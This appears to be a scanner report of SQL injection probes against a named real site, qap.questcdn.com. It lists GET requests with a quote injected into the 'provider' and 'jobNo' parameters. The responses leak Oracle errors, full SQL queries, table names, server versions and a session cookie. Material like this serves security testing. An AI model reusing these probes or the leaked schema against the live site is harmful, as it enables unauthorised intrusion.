dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 1048445 |
| provider | GET | %27 |
| jobNo | GET | 1438657 |
| caller | GET | projects/prj_browse/ipp_prj_browse_f.html |
| caller_params | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=%2527&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:05:59 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:01 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4044
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:06:01.769 [ 1] (TP-Processor1766) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:05:59 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:01 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4044
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:06:01.769 [ 1] (TP-Processor1766) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | 11 |
| provider | GET | %27 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=%2527&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:04 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4050
Content-Type: text/html;charset=utf-8
<font color="#FF0000">2011/03/01 14:06:04.726 [ 1] (TP-Processor1831) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:06:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:04 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4050
Content-Type: text/html;charset=utf-8
<font color="#FF0000">2011/03/01 14:06:04.726 [ 1] (TP-Processor1831) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 1048445 |
| provider | GET | 453856 |
| jobNo | GET | %27 |
| caller | GET | projects/prj_browse/ipp_prj_browse_f.html |
| caller_params | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=%2527&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:28 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:28 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7198
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=%2527&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=%2527', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=%2527', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { <font color="#FF0000">2011/03/01 14:06:28.579 [ 1] (TP-Processor1800) Problem including template component SQLLOOP query=" SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = <?p:jobNo?> " name="jt"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = %27 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=%2527&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="%27"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=%27&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:28 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:28 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7198
Content-Type: text/html;charset=utf-8
